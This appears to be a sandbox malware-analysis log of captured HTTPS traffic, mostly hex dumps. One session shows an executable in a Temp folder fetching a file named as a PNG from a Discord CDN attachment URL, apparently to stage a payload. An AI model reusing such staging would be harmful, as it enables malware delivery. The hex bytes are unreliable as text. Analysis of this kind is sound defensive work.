                                                                                                                                                                                      2021-10-30 11:52:03 UTC58INData Raw: aa 83 5d f5 23 76 95 cd 08 d9 b5 52 5d 3f 50 e5 8d d4 a3 f4 89 d9 41 c3 5d 1c 4f b7 1a b4 0f fc 58 de 1e d7 3b 31 af 4a bb 88 11 dd 4c ba 12 b7 8b 68 3c 09 a3 e8 02 76 9d db 2a 2e 3c 0e 31 0d 23 36 23 64 7d 81 4a 7f 14 cc f4 c5 6d 47 c6 64 8d cd 71 c0 cf 07 ed 63 d1 44 b2 c5 1e db f7 bc e7 3d db d4 e7 2e 8c 43 35 8f 59 8c 59 94 59 b4 59 ac f9 4e 96 ff d7 a5 9c 33 5f d4 c9 e3 6f 95 10 d9 b0 b8 e3 c0 51 9f 1f 8f 50 0e 82 f3 1d df f1 1d 43 8f 3d cf 3a eb ac 93 da ae fb 47 a4 ea df 0c d4 1d 77 f6 7e ff f7 7f 7f 79 fc c9 98 30 4e 80 0d 0e e6 0f fc c0 0f 2c 69 a1 be 0b e2 2e 1a 07 42 d9 2a ee 22 fb 8a 5e 9e 8b 20 4e dd 1c df 9d 35 ed aa 71 1e 5d d0 c9 21 a7 2c 63 e3 bb 6a d1 59 43 c8 d3 f7 d5 b0 8f e7 ca db 95 89 6c 5a 21 b4 74 4e 2b 7f 34 2f 23 cb af ca ec aa
                                                                                                                                                                                      Data Ascii: ]#vR]?PA]OX;1JLh<v*.<1#6#d}JmGdqcD=.C5YYYYN3_oQPC=:Gw~y0N,i.B*"^ N5q]!,cjYClZ!tN+4/#
                                                                                                                                                                                      2021-10-30 11:52:03 UTC59INData Raw: ee d9 42 a6 83 ac 1e 42 17 d7 29 1e c9 74 fb 84 9b fe c7 3f fe f1 6d 6a b3 bc d3 ea 89 4f 7c e2 e6 9b be e9 9b 96 5d 20 3e d1 3b 2c f6 38 13 bf fd db bf bd d5 6c ca 47 6d a0 fe 21 ad 39 7c 5c a9 e6 1f f7 1e 16 4e 9c 5c c6 d0 e1 11 e4 6d 6e 73 9b cd 45 2f 7a d1 e5 0d fc a4 d9 ed aa 7e 49 eb a8 4e fd 00 81 38 c2 df 2d bd e2 15 af 48 77 33 f9 11 01 ce e0 d7 7f fd d7 2f 2f 90 c5 f1 89 c7 a0 8d 7f f9 97 7f b9 b4 49 30 fe 38 0b d5 79 90 9e 30 9e 3b e1 f1 0a 6c 38 3e fd 11 7c a7 8e 3f 68 8f f3 8c fe 7f ec 63 1f 5b 74 82 36 32 6e 7e 7c da 23 67 87 5d 38 f2 25 a4 e5 b0 65 54 e7 b4 75 af a9 f2 d4 7f 8d 0f ed 41 f4 28 53 3f cc e1 03 10 f3 00 e1 6f b4 78 44 8d a8 cd cc 27 c6 48 3f 2a e1 9a fc a7 7f fa a7 e5 35 26 08 71 74 fa c1 09 1f 0e 10 c6 4b 0e 5c 74 da 20 86 d0
                                                                                                                                                                                      Data Ascii: BB)t?mjO|] >;,8lGm!9|\N\mnsE/z~IN8-Hw3//I08y0;l8>|?hc[t62n~|#g]8%eTuA(S?oxD'H?*5&qtK\t
                                                                                                                                                                                      2021-10-30 11:52:03 UTC61INData Raw: 64 79 8a 67 a1 8b 8e e3 21 8c c4 7b 8c d8 ce d4 37 0a 75 56 a2 f1 89 63 a1 72 bb b0 6b f9 d3 49 35 27 47 e7 6d 96 d7 b2 df 85 e3 32 ce f1 06 0f fc bd 0f 8b 88 3e e5 f7 38 93 e7 4c a4 ea 0b 7a c6 83 45 d5 6d 70 94 f4 8b 4b 1e 73 b2 8b c6 c2 ea 4e 13 d7 29 8e 18 af e7 78 e0 03 1f b8 2c d2 a3 b0 90 ff ce ef fc ce b2 d3 86 03 c8 2f 25 7f f1 17 7f 71 79 bd 05 0b b5 16 70 16 ef ec b1 27 7c e0 03 1f 58 fe 0d c0 89 f7 90 8a 38 37 d6 9e eb 58 ae 6a 2b ed 61 8c ab 5f ba c6 f6 ac bd 3e ab 7e cc ea 1d 6c 10 1f 5b 39 6c 72 d6 b8 ae 38 ff da 59 f3 5d 35 ec 01 e7 8b f1 91 b3 a6 73 2c 41 97 39 6b 8c 85 4b 85 fa e2 7d aa e2 30 9a 07 31 0d a3 3a 98 d1 cf d4 5b 81 7d 2c 33 5b 07 64 e3 5d 9d 83 d6 b9 69 e5 89 ca 66 b9 db 90 e9 e2 64 05 35 00 2e 95 5e a2 c9 ed 69 0f 47 c4 8f
                                                                                                                                                                                      Data Ascii: dyg!{7uVcrkI5'Gm2>8LzEmpKsN)x,/%qyp'|X87Xj+a_>~l[9lr8Y]5s,A9kK}01:[},3[d]ifd5.^iG
                                                                                                                                                                                      2021-10-30 11:52:03 UTC62INData Raw: a3 72 d8 e8 83 e6 01 42 f9 78 9f 01 8f 0b d7 51 c6 1d 35 9c 0a be d7 87 93 11 9d 35 ca c4 1f 3e 68 dc 80 d0 65 94 d8 3e 51 e9 2b 46 ed b1 93 a8 ff 8c a1 3f fe 94 83 e6 af eb 20 5f d7 1d fd 66 7c 7c 57 cd 25 3e fe c4 b6 fa 20 10 db ad 74 a5 87 56 1e c4 34 8c ea 60 46 3f 53 6f 86 6c bd 0c f1 d1 7a ab b9 36 3a 07 5b 76 a3 75 64 78 d9 53 1e 7d ce 30 3a 10 99 ae 22 da ce 94 75 66 fb 72 18 8c b4 81 fe 49 84 eb fc e6 19 6f a4 88 ec 23 99 4e b4 f2 8e 0b 71 ec b2 b1 74 5d 6f ac ab fc 5e b9 33 1d fa e7 8f d7 58 2c aa 5f 7e 62 7b 81 0b 5c 60 9b 3a 40 73 ee 4c 82 f6 7a 9b 3d ed a1 e2 f4 d1 61 47 48 8f 9e 32 67 03 07 e7 99 cf 7c e6 56 73 00 63 37 3a 97 64 4b 5d 7e 0e 38 4f fa 2f 50 9c 44 16 6a 3f 36 50 86 73 f8 13 3f f1 13 9b 77 bd eb 5d cb 8f 0f 78 ff da 4f fd d4 4f
                                                                                                                                                                                      Data Ascii: rBxQ55>he>Q+F? _f||W%> tV4`F?Solz6:[vudxS}0:"ufrIo#Nqt]o^3X,_~b{\`:@sLz=aGH2g|Vsc7:dK]~8O/PDj?6Ps?w]xOO
                                                                                                                                                                                      2021-10-30 11:52:03 UTC63INData Raw: 5d 76 c1 2a dc 19 89 0e 1a b0 63 c7 f7 eb 78 ef 1c 7d c0 b9 a0 4d b4 1b a7 e4 89 4f 7c e2 d6 f2 00 da ac 73 ac 71 11 4a 53 de 25 da 45 b2 f3 99 e9 c4 6c 1e 3a d7 2b cd d8 48 34 46 be ab c6 75 c6 35 e7 0e 1b 79 d8 68 2c e9 17 e7 1c 87 8c b1 93 c3 26 47 8d b9 28 67 cd 77 d5 46 88 7d 99 4d 8b 7d e8 47 75 23 a8 dc 3e eb 1c a5 35 0f d7 e4 45 bd a7 89 1f aa a3 d6 6a b0 18 b1 39 ae f4 da be af be 31 e9 d6 48 24 ea 7a e9 c3 24 1b 9b 6a bc 66 6c 5b 1c 55 99 e3 06 7d e0 e6 ee bc fc e5 2f 2f bf a7 c6 c2 ee b0 00 ad 61 74 3e d1 3e c9 28 aa 9b d0 e3 0a 5b d2 82 36 b0 20 22 2c 9c be 18 52 96 45 d8 df 9d d6 6b 77 cc a3 8e e8 e8 b0 93 c6 e3 ca de 6e 1a bf f0 f4 dd 34 ea d6 82 cd f9 8d ed 75 d8 cd ba d9 cd 6e b6 b9 e2 15 af b8 fc b8 80 f3 ee 0e 1b ff 53 8a c3 76 bf fb dd
                                                                                                                                                                                      Data Ascii: ]v*cx}MO|sqJS%El:+H4Fu5yh,&G(gwF}M}Gu#>5Ej91H$z$jfl[U}//at>>([6 ",REkwn4unSv
                                                                                                                                                                                      2021-10-30 11:52:03 UTC65INData Raw: 78 9d ff 8f 7d ec 63 cb f7 91 70 4a 78 bc a2 dd 23 6e fe 38 6a 2f 7a d1 8b 96 34 68 61 c9 f0 3e 66 32 8b da 37 1b 82 c7 47 d1 82 27 18 87 2b 5d e9 4a 8b 93 82 e3 e1 fd a6 3f fc af 26 8f ae 04 f9 55 3f a5 a7 5d 8c bd 73 b9 cb 5d 6e 73 9d eb 5c a7 dc 4d a3 5d ef 7e f7 bb 97 5d 2d 2f ab 73 d1 1a 5b e5 11 ca 21 f0 73 98 8d d3 47 3e f2 91 cd ab 5e f5 aa e5 15 1f 6f 7c e3 1b 17 c7 91 57 b5 b0 43 46 db 70 c4 d8 69 e3 f1 26 ed c5 39 c3 89 43 8f 0d f5 e3 4c b0 4b c7 ab 46 f8 d3 7a 87 71 55 1b d4 7e 89 74 6a 27 82 3d e3 21 bd 6c a1 3a cf b3 7a 18 29 93 c5 09 63 59 cf 13 6a b7 fa ee 7d 74 91 2d e7 9d f2 72 c8 18 53 89 1c 35 e2 cc 59 39 6a 94 19 a1 6a af 93 e9 44 95 37 5a 4f ab ee 35 b4 8e e1 79 9a 37 a0 f3 a1 b8 c2 a8 cf f2 66 74 51 2a 9b 4c ef 3a a8 3f 22 ef 09 1d
                                                                                                                                                                                      Data Ascii: x}cpJx#n8j/z4ha>f27G'+]J?&U?]s]ns\M]~]-/s[!sG>^o|WCFpi&9CLKFzqU~tj'=!l:z)cYj}t-rS5Y9jjD7ZO5y7ftQ*L:?"
                                                                                                                                                                                      2021-10-30 11:52:03 UTC66INData Raw: 5b 24 d3 c1 3e f4 95 ed 1a 54 57 eb f8 fb 3c de 5a 5a e3 df c3 db ef f1 e6 eb 39 76 39 a0 b3 af 7a 0e 83 d1 b6 b9 5d 8c bb 08 8f f7 98 b1 15 d9 84 ec 1d 7f e4 38 87 3d d1 69 83 8b a3 b4 eb 5b ba 48 a5 6f b1 a6 8c e3 ed 93 54 e9 8c 4a 7f 98 e8 c6 ce 4d 1e a2 33 21 58 0c b2 85 40 28 ad 7c c2 6c d1 c8 6e 3e 1e b6 74 50 c5 d7 a0 76 55 68 2c 58 28 71 5a af 75 ad 6b 2d 8f ab f4 58 12 e8 23 8f ac 58 28 5f fb da d7 6e b5 7d 78 ac cc f7 b7 f8 82 3e af b3 c0 51 e3 d5 28 d4 03 2c ea fc d5 12 3b 76 de cf 6c 5c 33 7c cc 5d 9c 11 bd 8e c7 b9 97 64 6d 90 ad 42 ec e8 4b 65 2b 51 be ea a6 8c 44 73 4e c7 f4 72 4e 6b 1e 54 79 33 fa a8 53 9a 30 c6 3d ed a8 cd 1e 46 c9 60 1e 50 17 73 90 b8 76 e4 78 bc 89 28 2e 07 50 0e 21 65 88 7b 9b 20 b6 cb a9 f2 5a 65 32 32 fb d9 3a c4 48
                                                                                                                                                                                      Data Ascii: [$>TW<ZZ9v9z]8=i[HoTJM3!X@(|ln>tPvUh,X(qZuk-X#X(_n}x>Q(,;vl\3|]dmBKe+QDsNrNkTy3S0=F`Psvx(.P!e{ Ze22:H
                                                                                                                                                                                      2021-10-30 11:52:03 UTC67INData Raw: 0b ec 7a f1 67 e5 38 5d 3c be 24 0f 3b 39 20 da 1d 61 c7 4c 6f f0 27 64 67 0d 27 4e 3f 48 78 da d3 9e b6 b9 fd ed 6f bf ec d2 b1 d0 3a aa 2b b6 31 6b 33 3a e9 15 8f 76 31 dd 23 b3 6f d5 ab bc 2c 2d 91 13 46 bf 08 71 cc e4 ac 49 af 3e 93 56 39 d5 e7 78 ba 37 57 b2 fc 9e 4e 71 0f 25 9e 16 55 bc 87 d7 07 da f9 92 78 3a 73 d8 d0 c5 47 9f e4 49 bc ae 1e 95 cd 8c 7e e4 38 fb 80 e3 64 a2 3c c7 e7 4a 36 a7 a2 2e c6 67 75 a3 fa 51 bc 7f ab 1c b5 99 83 b5 18 a9 67 ad cd 3e da a8 3a b2 d0 eb f7 74 0c 7b 8c da ed 4a af 7d 47 d5 0e c7 8f d9 6a 5f 6c 5b 4c 8f b0 a6 cc 08 de 5e 49 95 ce a8 f4 47 81 b7 4f b0 50 3a 6e a3 b8 eb 1c dd 54 84 e2 ae 8f a1 88 e9 b5 64 ed ca 68 d9 79 1f bd ed c0 3b c3 f8 ef 4d fe 6a 89 7f 74 60 27 0d c7 4c 36 94 c1 11 61 d7 4c 3f c8 20 8f 5f 87
                                                                                                                                                                                      Data Ascii: zg8]<$;9 aLo'dg'N?Hxo:+1k3:v1#o,-FqI>V9x7WNq%Ux:sGI~8d<J6.guQg>:t{J}Gj_l[L^IGOP:nTdhy;Mjt`'L6aL? _
                                                                                                                                                                                      2021-10-30 11:52:03 UTC69INData Raw: b1 1d 25 d6 e9 e9 2a 7e 18 a8 fe 18 c2 da 76 cc d8 ee 03 6f bb a4 4a 67 54 fa 35 f8 f1 44 a6 8b f8 0d 42 71 bf 71 b4 e2 1e 82 c7 8f 03 bd be f7 f2 23 99 bd 74 84 2e 99 4e 7a 27 b3 c9 c4 6d 9d 4c b7 2b a3 f5 65 76 6a 8f 1c b1 e8 9c 49 a2 8d 97 15 55 1c 62 5a 54 73 30 9b a7 1e c6 fc 98 16 1e 87 98 16 95 de a1 0f 23 76 42 7d f6 72 72 ca 10 77 d4 24 ca 93 8c 90 d9 8d 96 dd 07 3a 96 da 9c 49 86 cf 09 1f 2b 85 a3 f1 2c 3d a3 57 dc 51 9b d5 7e 3f 37 11 d5 a3 3a 56 ef a8 c5 46 ec c2 9a ba b2 32 bb b6 49 e5 09 63 bc 4a 57 f4 f2 2b fc 38 3d d6 1e 43 78 f9 2a 0e bb 1e 27 23 3b 5e 0c 61 e6 d8 33 b6 fb c2 db 2c a9 d2 19 95 7e 06 3f 8e c8 74 11 bf 41 f8 0d 63 34 2e 3c 2e 32 1d ec a3 bf 33 8c 1c 6f b6 4d d9 d8 ba 2e 8b ef a2 8b 71 70 fd 61 31 5a 77 d5 2e c4 1d b1 4c 64
                                                                                                                                                                                      Data Ascii: %*~voJgT5DBqq#t.Nz'mL+evjIUbZTs0#vB}rrw$:I+,=WQ~?7:VF2IcJW+8=Cx*'#;^a3,~?tAc4.<.23oM.qpa1Zw.Ld
                                                                                                                                                                                      2021-10-30 11:52:03 UTC70INData Raw: a7 b6 1c 17 46 c6 24 ce 57 a5 35 97 25 51 b7 06 6f 0f f1 56 1a 94 f6 3c c5 3d ed f4 d2 22 d3 cf e8 5a b6 ca d7 f5 1b 9d 35 77 d4 08 75 6d 03 ce 58 b6 b3 e6 8f 40 ab 73 90 b5 69 9f 8c d4 af be 67 b6 fb 68 5f 6f ee 8d cc 4d b5 23 b6 87 b4 ce 99 ce 89 c2 18 17 1e d7 b1 3d 3c 92 ef a8 1d 57 e2 80 64 cc d8 38 bb d6 39 43 55 cf 2e f5 57 93 c8 e3 23 cc 8e c3 48 9b 77 e9 d7 e9 a6 37 1e a3 7d e3 3c b8 64 37 02 42 49 d4 7b 88 c4 3a 47 98 b1 3d 0e 9c 49 6d 3d 13 d1 fc ed c9 2c d9 3c 8b ba 9e 4d 15 07 d7 7b 28 62 5a 64 fa 5d 74 0e f9 12 5d c3 08 ce 9a 3b 69 fe f8 93 3c ec 19 e3 e8 a8 69 57 cd 9d b5 5d ce c9 51 e2 63 71 58 ec 3a 06 de c6 28 7e bf 55 3c 4a 85 da 75 c2 51 5b db d0 ac dc 51 9e f8 d1 63 f5 ec c8 6f 89 6c 4e 17 a7 e3 d8 3e 81 aa 78 8b ac cd bb f6 e3 74 9e
                                                                                                                                                                                      Data Ascii: F$W5%QoV<="Z5wumX@sigh_oM#=<Wd89CU.W#Hw7}<d7BI{:G=Im=,<M{(bZd]t];i<iW]QcqX:(~U<JuQ[QcolN>xt


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      3192.168.2.349749162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:05 UTC71OUTGET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:05 UTC71INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:05 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 51625
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646f7b9ebf4ddc-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113684
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "93a8e487ac8ce3f27b99b41dffc28551"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:05 GMT
                                                                                                                                                                                      Last-Modified: Tue, 31 Aug 2021 22:36:05 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1630449365243747
                                                                                                                                                                                      x-goog-hash: crc32c=1FicIw==
                                                                                                                                                                                      x-goog-hash: md5=k6jkh6yM4/J7mbQd/8KFUQ==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 51625
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdt1ICNIEMaMI42SuNN7i8_NOKopXF6JXUHbBcq-xHfTiJPeMPhUeTgm6F0bxmQuMCMEl8Tr2TrGyPfu_yPBpIc
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0ZRweRKBA1QkVxK2S4mqmHDpspt1FMbnC8lwRZXCU9mebNsj57EF76VBE6CLLWQ2hJyKhdvV9OOqcj%2BWGWtGXVUngnR%2BjM7dKXh9icDM%2BsEu04LeYZltBWN0WyA5Nl1ZffZnZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:05 UTC73INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:05 UTC73INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 c9 3e 49 44 41 54 78 5e ed bd 0b d8 75 df 58 ef bf d4 de ff bd 3b a8 4d bb 1d 7b a7 44 a8 14 39 9f cb 99 12 39 2b 09 1d 9c cb 56 22 42 24 42 22 44 ce 84 10 3f 91 48 07 39 76 ce b9 84 42 42 28 87 4a c2 6e 1f ff 3e f3 59 df d7 f7 bd df fb 1e 87 b9 d6 f3 bc cf fb d3 e7 ba ee 6b 8c 71 8f 7b 8c 39 c6 98 63 ce 71 af 31 d7 9a eb 1c e7 3e f7 b9 ff df e6 08 39 c7 39 ce b1 8d 7d 36 4e 18 e3 ad 74 c6 ff fb 7f 79 37 bc 7c 26 b2 a9 a8 ea 75 2a 1b d7 2b 4e e8 f2 7f ff ef ff 3d 11 66 f1 28 aa 23 0b 77 25 1b 87 11 dd ac
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYsk>IDATx^uX;M{D99+V"B$B"D?H9vBB(Jn>Ykq{9cq1>99}6Nty7|&u*+N=f(#w%
                                                                                                                                                                                      2021-10-30 11:52:05 UTC74INData Raw: 6b 38 6a be a3 86 f4 9c 34 f0 78 86 e7 79 99 56 e8 44 1d 69 e4 b4 3a 6a 7e c3 f0 38 e8 84 3a 95 4d 4b dc ae 85 06 64 84 51 bb 1e 59 bb a2 4e f1 cc 76 2d aa ab 55 df e8 b1 7a 76 a3 f5 88 59 7b 3f 17 7e 0e a3 de 71 3b b1 6f 5d 8b ca be 55 47 cc 9b 4d 43 ab fe d3 4d 3c ef 9e ee c5 47 74 99 28 cf c3 0a 2f d7 b3 cd 60 ec 35 fe 8a 23 d9 a2 b0 2b 6b da 37 c3 da 36 56 e5 bc df ad 50 52 91 95 a9 68 d9 cc e4 55 21 10 f7 b4 88 fa cc c6 a9 ea 68 d1 cb 1f 61 1f 75 08 bf 76 70 d2 24 38 5b fa ce 19 12 77 d1 70 ce 5c f4 d8 53 df 51 a3 3e 77 d4 b4 8b 26 e7 0c 47 4d ce 5a e6 a8 e9 fb 6a 7a f4 e9 ce 5a e5 b0 55 22 3c 3e 42 65 ef fa d3 e2 a8 55 37 92 4c 1f 75 4a c7 10 88 4b 3c 2d 3c be 96 de 49 c8 f2 33 5d d6 ae a8 cb da 9b e9 46 a9 ea 1c 65 a4 6c cb a6 ca db a5 4d d0 3a 27
                                                                                                                                                                                      Data Ascii: k8j4xyVDi:j~8:MKdQYNv-UzvY{?~q;o]UGMCM<Gt(/`5#+k76VPRhU!hauvp$8[wp\SQ>w&GMZjzZU"<>BeU7LuJK<-<I3]FelM:'
                                                                                                                                                                                      2021-10-30 11:52:05 UTC75INData Raw: 6b a0 9c 2f ed 96 c9 39 73 71 07 0d e7 8c 90 f2 2e d4 85 54 f1 4a 07 31 ae 30 ea 20 b3 f3 10 7a f1 d3 e2 a8 29 9d c5 5d 2a bd c4 f3 7b 78 e7 47 69 95 a9 f2 32 bd eb 14 27 cc a4 37 69 5c 54 8f f0 78 c6 c8 38 39 95 7d d4 b7 d2 a3 79 23 f1 d8 67 42 1f 23 e9 3c 2e 3c 2e 46 75 30 ab 1f 21 96 6d a5 7b b6 90 e9 8e 13 7e 2e 61 e6 fc ef 5b e7 68 dc 3c 94 78 5a 71 27 a6 9d ec 58 8e b7 2f 8a 16 3b 0f a3 4e a2 3a 3c 74 32 dd 0c ad 3e 42 96 5f 95 c9 f4 6a 9f fa 15 1d 35 2d f6 1a 03 c0 4e 75 11 4a 3c ad b8 c2 4c a7 b0 95 17 c3 d1 bc 91 b4 e2 59 08 b3 3a a8 e2 30 9b 16 99 5e e7 cd 43 9d 23 3f 7f da 49 c3 f9 f2 9d b4 28 72 d0 64 ef e7 1b f4 c8 32 3a 6a ee 9c 29 8f 50 f6 08 eb 84 84 be c4 50 12 d3 2d 81 b5 21 b4 74 e0 f1 23 75 d4 b2 50 12 d3 51 5a f9 ca ab f0 0e 43 4c 67
                                                                                                                                                                                      Data Ascii: k/9sq.TJ10 z)]*{xGi2'7i\Tx89}y#gB#<.<.Fu0!m{~.a[h<xZq'X/;N:<t2>B_j5-NuJ<LY:0^C#?I(rd2:j)PP-!t#uPQZCLg
                                                                                                                                                                                      2021-10-30 11:52:05 UTC77INData Raw: 84 d0 8b 57 f9 30 9a 27 32 9d e6 08 a1 8b 3b 68 2d 27 4d f1 e8 a0 a9 bc e0 d8 7e 7d 49 2a 07 2d 5e 87 2a 4b 7c 44 a2 6d af ac da a8 30 d3 89 91 3c 68 e5 67 ba 43 7d f4 e9 27 3a 86 31 1e a5 95 27 e1 64 7b ba 2a b3 16 1f 30 a7 d2 3b 3e e8 d1 5e ba 28 ca 73 62 5a 78 df 3c cc e2 6b c9 ca 47 5d cf a6 65 3f 12 17 d9 38 54 63 13 99 29 3b ab 17 e4 67 ed 16 23 6d e8 a5 21 d3 1d 27 e2 18 8c 9c e3 2c 1e 43 98 d5 41 15 17 e8 24 c2 e3 8c 37 37 72 16 0b 1e b5 f4 c6 9f 7c b7 c9 8e d9 42 f6 55 b9 d8 ce 68 1f 43 f0 b8 13 f5 23 73 2b b3 19 29 57 11 c7 ca db 5f 89 f2 1d af 27 8b b7 74 9e 57 51 95 21 f4 f2 1e 87 2c af 0a 9d ac 1c 64 b6 91 11 9b 16 71 9c 25 72 94 11 77 ce e4 98 e9 11 a7 44 8f 3a e5 ac c9 51 93 93 46 3b b9 b6 e4 8c e9 1a 8b 92 39 6c 72 ae 7a 4e d6 88 a8 2d 99
                                                                                                                                                                                      Data Ascii: W0'2;h-'M~}I*-^*K|Dm0<hgC}':1'd{*0;>^(sbZx<kG]e?8Tc);g#m!',CA$77r|BUhC#s+)W_'tWQ!,dq%rwD:QF;9lrzN-
                                                                                                                                                                                      2021-10-30 11:52:05 UTC78INData Raw: 3a ef 8b a0 4e d5 1b e3 0a 33 dd 6c d8 8a 57 79 59 08 fb 8a 43 2f 1d d1 f8 65 e3 ad 9d 31 39 60 ee 94 45 07 8d 50 e7 47 75 71 6c 84 eb 02 91 53 e6 22 bd 87 2a e3 61 26 90 e9 2b 69 d5 e5 e2 f5 2a de 0a a1 a5 83 96 6d 0c c1 e3 70 28 3f 26 f0 93 1f c3 18 77 a9 f4 99 f8 85 1a f5 aa 47 28 de 1a 98 8c 2a bf a5 97 c4 74 14 cf df 05 f5 cd fb af b8 c4 f3 85 c7 41 f9 d1 ce c9 f4 23 3a 4f 8f c4 21 a6 1d 1f bf 88 eb 62 7e 35 d6 fb d2 8f 32 d2 ae 5d 8f 71 d8 b4 ce d7 4c 7c df 3a f0 38 c4 34 44 9d 16 8a 7f fd d7 7f 5d 42 c1 02 74 8f 7b dc 63 f3 4d df f4 4d 9b af f9 9a af d9 fc b7 ff f6 df 4e 3c f6 d4 17 a6 7d 41 63 01 fb e2 2f fe e2 cd 87 3f fc e1 cd 9b de f4 a6 6d 2d 07 f4 da 31 d2 ce cc 06 aa 7a 62 5c e9 18 66 cc cc ff 11 dd e8 9c f6 b6 21 d5 bd 5e 22 bc fe 2c de d2
                                                                                                                                                                                      Data Ascii: :N3lWyYC/e19`EPGuqlS"*a&+i*mp(?&wG(*tA#:O!b~52]qL|:84D]Bt{cMMN<}Ac/?m-1zb\f!^",
                                                                                                                                                                                      2021-10-30 11:52:05 UTC79INData Raw: c1 68 3e 54 71 91 e9 40 0b 08 8f 3d 05 b6 7c 2f 8d 1f 0d 9c e7 3c e7 29 9d 34 ce 19 0e de cd 6e 76 b3 cd 03 1e f0 80 cd c3 1e f6 b0 cd 05 2f 78 c1 cd bb de f5 ae 13 ef 5f fb fa af ff fa 25 14 87 71 9e 55 27 61 26 be 20 ee b2 38 66 64 fa ca 16 62 bd 0e 69 89 70 5d 4f 84 e2 2d 9d e7 f5 c8 ca 7a f9 5e dc 75 a2 2a 53 d1 b3 89 f9 cc 61 09 f7 73 89 ee fd d1 39 93 63 86 f0 fd cb b8 93 86 2d 42 79 ad 0f c0 71 99 4b ee 88 c9 39 73 c7 0c 59 3b ff a0 a5 1b 95 0c cf ab 6c 22 a3 f6 9e 9f d9 c6 7a 7a f5 1d 89 a3 96 a1 93 bd 06 9f 88 4e d4 67 a1 e7 8b 98 76 5a 03 4e 7a 44 64 1b c9 74 50 e9 7b 78 ff 10 2e 2a 39 60 72 ca 74 a1 ba a0 97 93 26 89 75 65 8c ea 2b bb b5 54 63 da d3 3b 95 2e d3 8b 5e 7e 8f ea 98 c7 99 d6 b9 9c 89 8f ea 60 34 1f aa b8 c8 74 a0 05 26 3e f2 bc e6
                                                                                                                                                                                      Data Ascii: h>Tq@=|/<)4nv/x_%qU'a& 8fdbip]O-z^u*Sas9c-ByqK9sY;l"zzNgvZNzDdtP{x.*9`rt&ue+Tc;.^~`4t&>
                                                                                                                                                                                      2021-10-30 11:52:05 UTC81INData Raw: a2 e4 22 45 f8 bb 1b fe 0e 87 50 3a f2 a3 c3 96 39 6b 15 33 f9 3d db d8 9f 2c 2d 51 da 89 69 70 7b 27 d3 89 aa cc 0c bb 96 3f 6c e2 b9 a8 ce 53 2f be 26 bf 57 06 3c 0e bd 74 06 0b 48 dc 4d e3 9d 69 38 68 5f fe e5 5f be 38 69 cc 7f e6 7c 84 05 e9 39 cf 79 ce e6 03 1f f8 c0 56 73 32 1c ff 9b bf f9 9b 97 05 8f 6b e5 8d 6f 7c e3 36 e7 e8 d1 5c d3 bc 75 89 8b a9 87 31 cf 25 12 75 99 8d f0 bc 96 9d 13 cb b4 c4 6d 84 eb 47 89 65 b2 fa a0 8a 3b fb a8 c3 61 7e 49 74 2f d6 bd 9d f9 2a e7 8c fb b6 ee f3 88 3e 90 eb fe ae 34 f3 34 73 ce 10 a0 4d 9a 0b d1 31 93 b4 e6 cb 88 38 99 de 75 95 44 bb 0a cf f3 72 59 98 91 95 af c8 f2 47 8e a1 b1 8f 1c ea a3 4f 3f a8 4f 80 0a d9 b8 54 f4 f2 5b 78 fd 2e 19 0c 6a 1c 58 e9 32 f1 7c e1 f1 c8 da 3c 88 f9 a4 5d 80 7e e9 62 76 47 4d
                                                                                                                                                                                      Data Ascii: "EP:9k3=,-Qip{'?lS/&W<tHMi8h__8i|9yVs2ko|6\u1%umGe;a~It/*>44sM18uDrYGO?OT[x.jX2|<]~bvGM
